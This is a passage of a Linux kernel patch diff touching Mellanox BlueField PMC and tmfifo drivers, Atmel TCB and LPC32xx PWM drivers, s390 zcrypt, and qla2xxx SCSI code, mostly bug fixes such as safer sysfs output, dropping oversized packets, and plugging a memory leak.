+@@ -246,6 +248,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_trio_events_2[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_ecc_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x100, "ECC_SINGLE_ERROR_CNT" },
+ 	{ 0x104, "ECC_DOUBLE_ERROR_CNT" },
+ 	{ 0x114, "SERR_INJ" },
+@@ -258,6 +261,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_ecc_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_mss_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0xc0, "RXREQ_MSS" },
+ 	{ 0xc1, "RXDAT_MSS" },
+ 	{ 0xc2, "TXRSP_MSS" },
+@@ -265,6 +269,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_mss_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_hnf_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x45, "HNF_REQUESTS" },
+ 	{ 0x46, "HNF_REJECTS" },
+ 	{ 0x47, "ALL_BUSY" },
+@@ -323,6 +328,7 @@ static const struct mlxbf_pmc_events mlxbf_pmc_hnf_events[] = {
+ };
+ 
+ static const struct mlxbf_pmc_events mlxbf_pmc_hnfnet_events[] = {
++	{ 0x0, "DISABLE" },
+ 	{ 0x12, "CDN_REQ" },
+ 	{ 0x13, "DDN_REQ" },
+ 	{ 0x14, "NDN_REQ" },
+@@ -892,7 +898,7 @@ static int mlxbf_pmc_read_event(int blk_num, uint32_t cnt_num, bool is_l3,
+ 				uint64_t *result)
+ {
+ 	uint32_t perfcfg_offset, perfval_offset;
+-	uint64_t perfmon_cfg, perfevt, perfctl;
++	uint64_t perfmon_cfg, perfevt;
+ 
+ 	if (cnt_num >= pmc->block[blk_num].counters)
+ 		return -EINVAL;
+@@ -904,25 +910,6 @@ static int mlxbf_pmc_read_event(int blk_num, uint32_t cnt_num, bool is_l3,
+ 	perfval_offset = perfcfg_offset +
+ 			 pmc->block[blk_num].counters * MLXBF_PMC_REG_SIZE;
+ 
+-	/* Set counter in "read" mode */
+-	perfmon_cfg = FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_ADDR,
+-				 MLXBF_PMC_PERFCTL);
+-	perfmon_cfg |= FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_STROBE, 1);
+-	perfmon_cfg |= FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_WR_R_B, 0);
+-
+-	if (mlxbf_pmc_write(pmc->block[blk_num].mmio_base + perfcfg_offset,
+-			    MLXBF_PMC_WRITE_REG_64, perfmon_cfg))
+-		return -EFAULT;
+-
+-	/* Check if the counter is enabled */
+-
+-	if (mlxbf_pmc_read(pmc->block[blk_num].mmio_base + perfval_offset,
+-			   MLXBF_PMC_READ_REG_64, &perfctl))
+-		return -EFAULT;
+-
+-	if (!FIELD_GET(MLXBF_PMC_PERFCTL_EN0, perfctl))
+-		return -EINVAL;
+-
+ 	/* Set counter in "read" mode */
+ 	perfmon_cfg = FIELD_PREP(MLXBF_PMC_PERFMON_CONFIG_ADDR,
+ 				 MLXBF_PMC_PERFEVT);
+@@ -1008,7 +995,7 @@ static ssize_t mlxbf_pmc_counter_show(struct device *dev,
+ 	} else
+ 		return -EINVAL;
+ 
+-	return sprintf(buf, "0x%llx\n", value);
++	return sysfs_emit(buf, "0x%llx\n", value);
+ }
+ 
+ /* Store function for "counter" sysfs files */
+@@ -1078,13 +1065,13 @@ static ssize_t mlxbf_pmc_event_show(struct device *dev,
+ 
+ 	err = mlxbf_pmc_read_event(blk_num, cnt_num, is_l3, &evt_num);
+ 	if (err)
+-		return sprintf(buf, "No event being monitored\n");
++		return sysfs_emit(buf, "No event being monitored\n");
+ 
+ 	evt_name = mlxbf_pmc_get_event_name(pmc->block_name[blk_num], evt_num);
+ 	if (!evt_name)
+ 		return -EINVAL;
+ 
+-	return sprintf(buf, "0x%llx: %s\n", evt_num, evt_name);
++	return sysfs_emit(buf, "0x%llx: %s\n", evt_num, evt_name);
+ }
+ 
+ /* Store function for "event" sysfs files */
+@@ -1139,9 +1126,9 @@ static ssize_t mlxbf_pmc_event_list_show(struct device *dev,
+ 		return -EINVAL;
+ 
+ 	for (i = 0, buf[0] = '\0'; i < size; ++i) {
+-		len += sprintf(e_info, "0x%x: %s\n", events[i].evt_num,
+-			       events[i].evt_name);
+-		if (len > PAGE_SIZE)
++		len += snprintf(e_info, sizeof(e_info), "0x%x: %s\n",
++				events[i].evt_num, events[i].evt_name);
++		if (len >= PAGE_SIZE)
+ 			break;
+ 		strcat(buf, e_info);
+ 		ret = len;
+@@ -1168,7 +1155,7 @@ static ssize_t mlxbf_pmc_enable_show(struct device *dev,
+ 
+ 	value = FIELD_GET(MLXBF_PMC_L3C_PERF_CNT_CFG_EN, perfcnt_cfg);
+ 
+-	return sprintf(buf, "%d\n", value);
++	return sysfs_emit(buf, "%d\n", value);
+ }
+ 
+ /* Store function for "enable" sysfs files - only for l3cache */
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index d31fe7eed38df..a04ff89a7ec44 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -56,6 +56,7 @@ struct mlxbf_tmfifo;
+  * @vq: pointer to the virtio virtqueue
+  * @desc: current descriptor of the pending packet
+  * @desc_head: head descriptor of the pending packet
++ * @drop_desc: dummy desc for packet dropping
+  * @cur_len: processed length of the current descriptor
+  * @rem_len: remaining length of the pending packet
+  * @pkt_len: total length of the pending packet
+@@ -72,6 +73,7 @@ struct mlxbf_tmfifo_vring {
+ 	struct virtqueue *vq;
+ 	struct vring_desc *desc;
+ 	struct vring_desc *desc_head;
++	struct vring_desc drop_desc;
+ 	int cur_len;
+ 	int rem_len;
+ 	u32 pkt_len;
+@@ -83,6 +85,14 @@ struct mlxbf_tmfifo_vring {
+ 	struct mlxbf_tmfifo *fifo;
+ };
+ 
++/* Check whether vring is in drop mode. */
++#define IS_VRING_DROP(_r) ({ \
++	typeof(_r) (r) = (_r); \
++	(r->desc_head == &r->drop_desc ? true : false); })
++
++/* A stub length used to drop a maximum-length packet. */
++#define VRING_DROP_DESC_MAX_LEN		GENMASK(15, 0)
++
+ /* Interrupt types. */
+ enum {
+ 	MLXBF_TM_RX_LWM_IRQ,
+@@ -195,7 +205,7 @@ static u8 mlxbf_tmfifo_net_default_mac[ETH_ALEN] = {
+ static efi_char16_t mlxbf_tmfifo_efi_name[] = L"RshimMacAddr";
+ 
+ /* Maximum L2 header length. */
+-#define MLXBF_TMFIFO_NET_L2_OVERHEAD	36
++#define MLXBF_TMFIFO_NET_L2_OVERHEAD	(ETH_HLEN + VLAN_HLEN)
+ 
+ /* Supported virtio-net features. */
+ #define MLXBF_TMFIFO_NET_FEATURES \
+@@ -243,6 +253,7 @@ static int mlxbf_tmfifo_alloc_vrings(struct mlxbf_tmfifo *fifo,
+ 		vring->align = SMP_CACHE_BYTES;
+ 		vring->index = i;
+ 		vring->vdev_id = tm_vdev->vdev.id.device;
++		vring->drop_desc.len = VRING_DROP_DESC_MAX_LEN;
+ 		dev = &tm_vdev->vdev.dev;
+ 
+ 		size = vring_size(vring->num, vring->align);
+@@ -348,7 +359,7 @@ static u32 mlxbf_tmfifo_get_pkt_len(struct mlxbf_tmfifo_vring *vring,
+ 	return len;
+ }
+ 
+-static void mlxbf_tmfifo_release_pending_pkt(struct mlxbf_tmfifo_vring *vring)
++static void mlxbf_tmfifo_release_pkt(struct mlxbf_tmfifo_vring *vring)
+ {
+ 	struct vring_desc *desc_head;
+ 	u32 len = 0;
+@@ -577,19 +588,25 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+ 
+ 	if (vring->cur_len + sizeof(u64) <= len) {
+ 		/* The whole word. */
+-		if (is_rx)
+-			memcpy(addr + vring->cur_len, &data, sizeof(u64));
+-		else
+-			memcpy(&data, addr + vring->cur_len, sizeof(u64));
++		if (!IS_VRING_DROP(vring)) {
++			if (is_rx)
++				memcpy(addr + vring->cur_len, &data,
++				       sizeof(u64));
++			else
++				memcpy(&data, addr + vring->cur_len,
++				       sizeof(u64));
++		}
+ 		vring->cur_len += sizeof(u64);
+ 	} else {
+ 		/* Leftover bytes. */
+-		if (is_rx)
+-			memcpy(addr + vring->cur_len, &data,
+-			       len - vring->cur_len);
+-		else
+-			memcpy(&data, addr + vring->cur_len,
+-			       len - vring->cur_len);
++		if (!IS_VRING_DROP(vring)) {
++			if (is_rx)
++				memcpy(addr + vring->cur_len, &data,
++				       len - vring->cur_len);
++			else
++				memcpy(&data, addr + vring->cur_len,
++				       len - vring->cur_len);
++		}
+ 		vring->cur_len = len;
+ 	}
+ 
+@@ -606,13 +623,14 @@ static void mlxbf_tmfifo_rxtx_word(struct mlxbf_tmfifo_vring *vring,
+  * flag is set.
+  */
+ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+-				     struct vring_desc *desc,
++				     struct vring_desc **desc,
+ 				     bool is_rx, bool *vring_change)
+ {
+ 	struct mlxbf_tmfifo *fifo = vring->fifo;
+ 	struct virtio_net_config *config;
+ 	struct mlxbf_tmfifo_msg_hdr hdr;
+ 	int vdev_id, hdr_len;
++	bool drop_rx = false;
+ 
+ 	/* Read/Write packet header. */
+ 	if (is_rx) {
+@@ -632,8 +650,8 @@ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+ 			if (ntohs(hdr.len) >
+ 			    __virtio16_to_cpu(virtio_legacy_is_little_endian(),
+ 					      config->mtu) +
+-			    MLXBF_TMFIFO_NET_L2_OVERHEAD)
+-				return;
++					      MLXBF_TMFIFO_NET_L2_OVERHEAD)
++				drop_rx = true;
+ 		} else {
+ 			vdev_id = VIRTIO_ID_CONSOLE;
+ 			hdr_len = 0;
+@@ -648,16 +666,25 @@ static void mlxbf_tmfifo_rxtx_header(struct mlxbf_tmfifo_vring *vring,
+ 
+ 			if (!tm_dev2)
+ 				return;
+-			vring->desc = desc;
++			vring->desc = *desc;
+ 			vring = &tm_dev2->vrings[MLXBF_TMFIFO_VRING_RX];
+ 			*vring_change = true;
+ 		}
++
++		if (drop_rx && !IS_VRING_DROP(vring)) {
++			if (vring->desc_head)
++				mlxbf_tmfifo_release_pkt(vring);
++			*desc = &vring->drop_desc;
++			vring->desc_head = *desc;
++			vring->desc = *desc;
++		}
++
+ 		vring->pkt_len = ntohs(hdr.len) + hdr_len;
+ 	} else {
+ 		/* Network virtio has an extra header. */
+ 		hdr_len = (vring->vdev_id == VIRTIO_ID_NET) ?
+ 			   sizeof(struct virtio_net_hdr) : 0;
+-		vring->pkt_len = mlxbf_tmfifo_get_pkt_len(vring, desc);
++		vring->pkt_len = mlxbf_tmfifo_get_pkt_len(vring, *desc);
+ 		hdr.type = (vring->vdev_id == VIRTIO_ID_NET) ?
+ 			    VIRTIO_ID_NET : VIRTIO_ID_CONSOLE;
+ 		hdr.len = htons(vring->pkt_len - hdr_len);
+@@ -690,15 +717,23 @@ static bool mlxbf_tmfifo_rxtx_one_desc(struct mlxbf_tmfifo_vring *vring,
+ 	/* Get the descriptor of the next packet. */
+ 	if (!vring->desc) {
+ 		desc = mlxbf_tmfifo_get_next_pkt(vring, is_rx);
+-		if (!desc)
+-			return false;
++		if (!desc) {
++			/* Drop the next Rx packet to avoid getting stuck. */
++			if (is_rx) {
++				desc = &vring->drop_desc;
++				vring->desc_head = desc;
++				vring->desc = desc;
++			} else {
++				return false;
++			}
++		}
+ 	} else {
+ 		desc = vring->desc;
+ 	}
+ 
+ 	/* Beginning of a packet. Start to Rx/Tx packet header. */
+ 	if (vring->pkt_len == 0) {
+-		mlxbf_tmfifo_rxtx_header(vring, desc, is_rx, &vring_change);
++		mlxbf_tmfifo_rxtx_header(vring, &desc, is_rx, &vring_change);
+ 		(*avail)--;
+ 
+ 		/* Return if new packet is for another ring. */
+@@ -724,17 +759,24 @@ static bool mlxbf_tmfifo_rxtx_one_desc(struct mlxbf_tmfifo_vring *vring,
+ 		vring->rem_len -= len;
+ 
+ 		/* Get the next desc on the chain. */
+-		if (vring->rem_len > 0 &&
++		if (!IS_VRING_DROP(vring) && vring->rem_len > 0 &&
+ 		    (virtio16_to_cpu(vdev, desc->flags) & VRING_DESC_F_NEXT)) {
+ 			idx = virtio16_to_cpu(vdev, desc->next);
+ 			desc = &vr->desc[idx];
+ 			goto mlxbf_tmfifo_desc_done;
+ 		}
+ 
+-		/* Done and release the pending packet. */
+-		mlxbf_tmfifo_release_pending_pkt(vring);
++		/* Done and release the packet. */
+ 		desc = NULL;
+ 		fifo->vring[is_rx] = NULL;
++		if (!IS_VRING_DROP(vring)) {
++			mlxbf_tmfifo_release_pkt(vring);
++		} else {
++			vring->pkt_len = 0;
++			vring->desc_head = NULL;
++			vring->desc = NULL;
++			return false;
++		}
+ 
+ 		/*
+ 		 * Make sure the load/store are in order before
+@@ -914,7 +956,7 @@ static void mlxbf_tmfifo_virtio_del_vqs(struct virtio_device *vdev)
+ 
+ 		/* Release the pending packet. */
+ 		if (vring->desc)
+-			mlxbf_tmfifo_release_pending_pkt(vring);
++			mlxbf_tmfifo_release_pkt(vring);
+ 		vq = vring->vq;
+ 		if (vq) {
+ 			vring->vq = NULL;
+diff --git a/drivers/pwm/pwm-atmel-tcb.c b/drivers/pwm/pwm-atmel-tcb.c
+index 2837b4ce8053c..2826fc216d291 100644
+--- a/drivers/pwm/pwm-atmel-tcb.c
++++ b/drivers/pwm/pwm-atmel-tcb.c
+@@ -422,13 +422,14 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ 	struct atmel_tcb_pwm_chip *tcbpwm;
+ 	const struct atmel_tcb_config *config;
+ 	struct device_node *np = pdev->dev.of_node;
+-	struct regmap *regmap;
+-	struct clk *clk, *gclk = NULL;
+-	struct clk *slow_clk;
+ 	char clk_name[] = "t0_clk";
+ 	int err;
+ 	int channel;
+ 
++	tcbpwm = devm_kzalloc(&pdev->dev, sizeof(*tcbpwm), GFP_KERNEL);
++	if (tcbpwm == NULL)
++		return -ENOMEM;
++
+ 	err = of_property_read_u32(np, "reg", &channel);
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev,
+@@ -437,49 +438,43 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ 		return err;
+ 	}
+ 
+-	regmap = syscon_node_to_regmap(np->parent);
+-	if (IS_ERR(regmap))
+-		return PTR_ERR(regmap);
++	tcbpwm->regmap = syscon_node_to_regmap(np->parent);
++	if (IS_ERR(tcbpwm->regmap))
++		return PTR_ERR(tcbpwm->regmap);
+ 
+-	slow_clk = of_clk_get_by_name(np->parent, "slow_clk");
+-	if (IS_ERR(slow_clk))
+-		return PTR_ERR(slow_clk);
++	tcbpwm->slow_clk = of_clk_get_by_name(np->parent, "slow_clk");
++	if (IS_ERR(tcbpwm->slow_clk))
++		return PTR_ERR(tcbpwm->slow_clk);
+ 
+ 	clk_name[1] += channel;
+-	clk = of_clk_get_by_name(np->parent, clk_name);
+-	if (IS_ERR(clk))
+-		clk = of_clk_get_by_name(np->parent, "t0_clk");
+-	if (IS_ERR(clk))
+-		return PTR_ERR(clk);
++	tcbpwm->clk = of_clk_get_by_name(np->parent, clk_name);
++	if (IS_ERR(tcbpwm->clk))
++		tcbpwm->clk = of_clk_get_by_name(np->parent, "t0_clk");
++	if (IS_ERR(tcbpwm->clk)) {
++		err = PTR_ERR(tcbpwm->clk);
++		goto err_slow_clk;
++	}
+ 
+ 	match = of_match_node(atmel_tcb_of_match, np->parent);
+ 	config = match->data;
+ 
+ 	if (config->has_gclk) {
+-		gclk = of_clk_get_by_name(np->parent, "gclk");
+-		if (IS_ERR(gclk))
+-			return PTR_ERR(gclk);
+-	}
+-
+-	tcbpwm = devm_kzalloc(&pdev->dev, sizeof(*tcbpwm), GFP_KERNEL);
+-	if (tcbpwm == NULL) {
+-		err = -ENOMEM;
+-		goto err_slow_clk;
++		tcbpwm->gclk = of_clk_get_by_name(np->parent, "gclk");
++		if (IS_ERR(tcbpwm->gclk)) {
++			err = PTR_ERR(tcbpwm->gclk);
++			goto err_clk;
++		}
+ 	}
+ 
+ 	tcbpwm->chip.dev = &pdev->dev;
+ 	tcbpwm->chip.ops = &atmel_tcb_pwm_ops;
+ 	tcbpwm->chip.npwm = NPWM;
+ 	tcbpwm->channel = channel;
+-	tcbpwm->regmap = regmap;
+-	tcbpwm->clk = clk;
+-	tcbpwm->gclk = gclk;
+-	tcbpwm->slow_clk = slow_clk;
+ 	tcbpwm->width = config->counter_width;
+ 
+-	err = clk_prepare_enable(slow_clk);
++	err = clk_prepare_enable(tcbpwm->slow_clk);
+ 	if (err)
+-		goto err_slow_clk;
++		goto err_gclk;
+ 
+ 	spin_lock_init(&tcbpwm->lock);
+ 
+@@ -494,23 +489,28 @@ static int atmel_tcb_pwm_probe(struct platform_device *pdev)
+ err_disable_clk:
+ 	clk_disable_unprepare(tcbpwm->slow_clk);
+ 
++err_gclk:
++	clk_put(tcbpwm->gclk);
++
++err_clk:
++	clk_put(tcbpwm->clk);
++
+ err_slow_clk:
+-	clk_put(slow_clk);
++	clk_put(tcbpwm->slow_clk);
+ 
+ 	return err;
+ }
+ 
+-static int atmel_tcb_pwm_remove(struct platform_device *pdev)
++static void atmel_tcb_pwm_remove(struct platform_device *pdev)
+ {
+ 	struct atmel_tcb_pwm_chip *tcbpwm = platform_get_drvdata(pdev);
+ 
+ 	pwmchip_remove(&tcbpwm->chip);
+ 
+ 	clk_disable_unprepare(tcbpwm->slow_clk);
+-	clk_put(tcbpwm->slow_clk);
++	clk_put(tcbpwm->gclk);
+ 	clk_put(tcbpwm->clk);
+-
+-	return 0;
++	clk_put(tcbpwm->slow_clk);
+ }
+ 
+ static const struct of_device_id atmel_tcb_pwm_dt_ids[] = {
+@@ -564,7 +564,7 @@ static struct platform_driver atmel_tcb_pwm_driver = {
+ 		.pm = &atmel_tcb_pwm_pm_ops,
+ 	},
+ 	.probe = atmel_tcb_pwm_probe,
+-	.remove = atmel_tcb_pwm_remove,
++	.remove_new = atmel_tcb_pwm_remove,
+ };
+ module_platform_driver(atmel_tcb_pwm_driver);
+ 
+diff --git a/drivers/pwm/pwm-lpc32xx.c b/drivers/pwm/pwm-lpc32xx.c
+index 86a0ea0f6955c..806f0bb3ad6d8 100644
+--- a/drivers/pwm/pwm-lpc32xx.c
++++ b/drivers/pwm/pwm-lpc32xx.c
+@@ -51,10 +51,10 @@ static int lpc32xx_pwm_config(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	if (duty_cycles > 255)
+ 		duty_cycles = 255;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~0xFFFF;
+ 	val |= (period_cycles << 8) | duty_cycles;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	return 0;
+ }
+@@ -69,9 +69,9 @@ static int lpc32xx_pwm_enable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	if (ret)
+ 		return ret;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val |= PWM_ENABLE;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	return 0;
+ }
+@@ -81,9 +81,9 @@ static void lpc32xx_pwm_disable(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	struct lpc32xx_pwm_chip *lpc32xx = to_lpc32xx_pwm_chip(chip);
+ 	u32 val;
+ 
+-	val = readl(lpc32xx->base + (pwm->hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~PWM_ENABLE;
+-	writel(val, lpc32xx->base + (pwm->hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	clk_disable_unprepare(lpc32xx->clk);
+ }
+@@ -141,9 +141,9 @@ static int lpc32xx_pwm_probe(struct platform_device *pdev)
+ 	lpc32xx->chip.npwm = 1;
+ 
+ 	/* If PWM is disabled, configure the output to the default value */
+-	val = readl(lpc32xx->base + (lpc32xx->chip.pwms[0].hwpwm << 2));
++	val = readl(lpc32xx->base);
+ 	val &= ~PWM_PIN_LEVEL;
+-	writel(val, lpc32xx->base + (lpc32xx->chip.pwms[0].hwpwm << 2));
++	writel(val, lpc32xx->base);
+ 
+ 	ret = devm_pwmchip_add(&pdev->dev, &lpc32xx->chip);
+ 	if (ret < 0) {
+diff --git a/drivers/s390/crypto/zcrypt_api.c b/drivers/s390/crypto/zcrypt_api.c
+index f94b43ce9a658..28e34d155334b 100644
+--- a/drivers/s390/crypto/zcrypt_api.c
++++ b/drivers/s390/crypto/zcrypt_api.c
+@@ -441,6 +441,7 @@ static int zcdn_create(const char *name)
+ 			 ZCRYPT_NAME "_%d", (int)MINOR(devt));
+ 	nodename[sizeof(nodename) - 1] = '\0';
+ 	if (dev_set_name(&zcdndev->device, nodename)) {
++		kfree(zcdndev);
+ 		rc = -EINVAL;
+ 		goto unlockout;
+ 	}
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index 64734d6e8ccb1..07fbaa452d8a1 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -3093,8 +3093,6 @@ qla24xx_vport_create(struct fc_vport *fc_vport, bool disable)
+ 			vha->flags.difdix_supported = 1;
+ 			ql_dbg(ql_dbg_user, vha, 0x7082,
+ 			    "Registered for DIF/DIX type 1 and 3 protection.\n");
+-			if (ql2xenabledif == 1)
+-				prot = SHOST_DIX_TYPE0_PROTECTION;
+ 			scsi_host_set_prot(vha->host,
+ 			    prot | SHOST_DIF_TYPE1_PROTECTION
+ 			    | SHOST_DIF_TYPE2_PROTECTION
+diff --git a/drivers/scsi/qla2xxx/qla_dbg.c b/drivers/scsi/qla2xxx/qla_dbg.c
+index d7e8454304cee..ab637324262ff 100644
+--- a/drivers/scsi/qla2xxx/qla_dbg.c
++++ b/drivers/scsi/qla2xxx/qla_dbg.c
+@@ -18,7 +18,7 @@
+  * | Queue Command and IO tracing |       0x3074       | 0x300b         |
+  * |                              |                    | 0x3027-0x3028  |
+  * |                              |                    | 0x303d-0x3041  |
+- * |                              |                    | 0x302d,0x3033  |
++ * |                              |                    | 0x302e,0x3033  |
+  * |                              |                    | 0x3036,0x3038  |
+  * |                              |                    | 0x303a		|
+  * | DPC Thread                   |       0x4023       | 0x4002,0x4013  |
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 5a2f629d18e69..7d282906598f3 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -458,6 +458,7 @@ static inline be_id_t port_id_to_be_id(port_id_t port_id)
+ }
+ 
+ struct tmf_arg {
++	struct list_head tmf_elem;
+ 	struct qla_qpair *qpair;
+ 	struct fc_port *fcport;
+ 	struct scsi_qla_host *vha;
+@@ -2534,7 +2535,6 @@ enum rscn_addr_format {
+ typedef struct fc_port {
+ 	struct list_head list;
+ 	struct scsi_qla_host *vha;
+-	struct list_head tmf_pending;
+ 
+ 	unsigned int conf_compl_supported:1;
+ 	unsigned int deleted:2;
+@@ -2555,9 +2555,6 @@ typedef struct fc_port {
+ 	unsigned int do_prli_nvme:1;
+ 
+ 	uint8_t nvme_flag;
+-	uint8_t active_tmf;
+-#define MAX_ACTIVE_TMF 8
+-
+ 	uint8_t node_name[WWN_SIZE];
+ 	uint8_t port_name[WWN_SIZE];
+ 	port_id_t d_id;
+@@ -3743,6 +3740,16 @@ struct qla_fw_resources {
+ 	u16 pad;
+ };
+ 
++struct qla_fw_res {
++	u16      iocb_total;
++	u16      iocb_limit;
++	atomic_t iocb_used;
++
++	u16      exch_total;
++	u16      exch_limit;
++	atomic_t exch_used;
++};
++
+ #define QLA_IOCB_PCT_LIMIT 95
+ 
+ /*Queue pair data structure */
+@@ -4370,7 +4377,6 @@ struct qla_hw_data {
+ 	uint8_t		aen_mbx_count;
+ 	atomic_t	num_pend_mbx_stage1;
+ 	atomic_t	num_pend_mbx_stage2;
+-	atomic_t	num_pend_mbx_stage3;
+ 	uint16_t	frame_payload_size;
+ 
+ 	uint32_t	login_retry_count;
+@@ -4640,6 +4646,8 @@ struct qla_hw_data {
+ 		uint32_t	flt_region_aux_img_status_sec;
+ 	};
+ 	uint8_t         active_image;
++	uint8_t active_tmf;
++#define MAX_ACTIVE_TMF 8
+ 
+ 	/* Needed for BEACON */
+ 	uint16_t        beacon_blink_led;
+@@ -4654,6 +4662,8 @@ struct qla_hw_data {
+ 
+ 	struct qla_msix_entry *msix_entries;
+ 
++	struct list_head tmf_pending;
++	struct list_head tmf_active;
+ 	struct list_head        vp_list;        /* list of VP */
+ 	unsigned long   vp_idx_map[(MAX_MULTI_ID_FABRIC / 8) /
+ 			sizeof(unsigned long)];
+@@ -4782,6 +4792,7 @@ struct qla_hw_data {
+ 	spinlock_t sadb_lock;	/* protects list */
+ 	struct els_reject elsrej;
+ 	u8 edif_post_stop_cnt_down;
++	struct qla_fw_res fwres ____cacheline_aligned;
+ };
+ 
+ #define RX_ELS_SIZE (roundup(sizeof(struct enode) + ELS_MAX_PAYLOAD, SMP_CACHE_BYTES))
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 1925cc6897b68..f060e593685de 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -276,6 +276,16 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 
+ 		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
+ 			   exch_used, ha->base_qpair->fwres.exch_limit);
++
++		if (ql2xenforce_iocb_limit == 2) {
++			iocbs_used = atomic_read(&ha->fwres.iocb_used);
++			exch_used  = atomic_read(&ha->fwres.exch_used);
++			seq_printf(s, "        estimate iocb2 used [%d] high water limit [%d]\n",
++					iocbs_used, ha->fwres.iocb_limit);
++
++			seq_printf(s, "        estimate exchange2 used[%d] high water limit [%d] \n",
++					exch_used, ha->fwres.exch_limit);
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index 316122709b0e6..2e4537f9e5b50 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -143,6 +143,7 @@ void qla_edif_sess_down(struct scsi_qla_host *vha, struct fc_port *sess);
+ void qla_edif_clear_appdata(struct scsi_qla_host *vha,
+ 			    struct fc_port *fcport);
+ const char *sc_to_str(uint16_t cmd);
++void qla_adjust_iocb_limit(scsi_qla_host_t *vha);
+ 
+ /*
+  * Global Data in qla_os.c source file.
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 30bbf33e3a6aa..36abdb0de1694 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -502,6 +502,7 @@ static
+ void qla24xx_handle_adisc_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ {
+ 	struct fc_port *fcport = ea->fcport;
++	unsigned long flags;
+ 
+ 	ql_dbg(ql_dbg_disc, vha, 0x20d2,
+ 	    "%s %8phC DS %d LS %d rc %d login %d|%d rscn %d|%d lid %d\n",
+@@ -516,9 +517,15 @@ void qla24xx_handle_adisc_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ 		ql_dbg(ql_dbg_disc, vha, 0x2066,
+ 		    "%s %8phC: adisc fail: post delete\n",
+ 		    __func__, ea->fcport->port_name);
++
++		spin_lock_irqsave(&vha->work_lock, flags);
+ 		/* deleted = 0 & logout_on_delete = force fw cleanup */
+-		fcport->deleted = 0;
++		if (fcport->deleted == QLA_SESS_DELETED)
++			fcport->deleted = 0;
++
+ 		fcport->logout_on_delete = 1;
++		spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 		qlt_schedule_sess_for_deletion(ea->fcport);
+ 		return;
+ 	}
+@@ -1128,7 +1135,7 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ 	u16 *mb;
+ 
+ 	if (!vha->flags.online || (fcport->flags & FCF_ASYNC_SENT))
+-		return rval;
++		goto done;
+ 
+ 	ql_dbg(ql_dbg_disc, vha, 0x20d9,
+ 	    "Async-gnlist WWPN %8phC \n", fcport->port_name);
+@@ -1182,8 +1189,9 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++	fcport->flags &= ~(FCF_ASYNC_SENT);
+ done:
+-	fcport->flags &= ~(FCF_ASYNC_ACTIVE | FCF_ASYNC_SENT);
++	fcport->flags &= ~(FCF_ASYNC_ACTIVE);
+ 	return rval;
+ }
+ 
+@@ -1440,7 +1448,6 @@ void __qla24xx_handle_gpdb_event(scsi_qla_host_t *vha, struct event_arg *ea)
+ 
+ 	spin_lock_irqsave(&vha->hw->tgt.sess_lock, flags);
+ 	ea->fcport->login_gen++;
+-	ea->fcport->deleted = 0;
+ 	ea->fcport->logout_on_delete = 1;
+ 
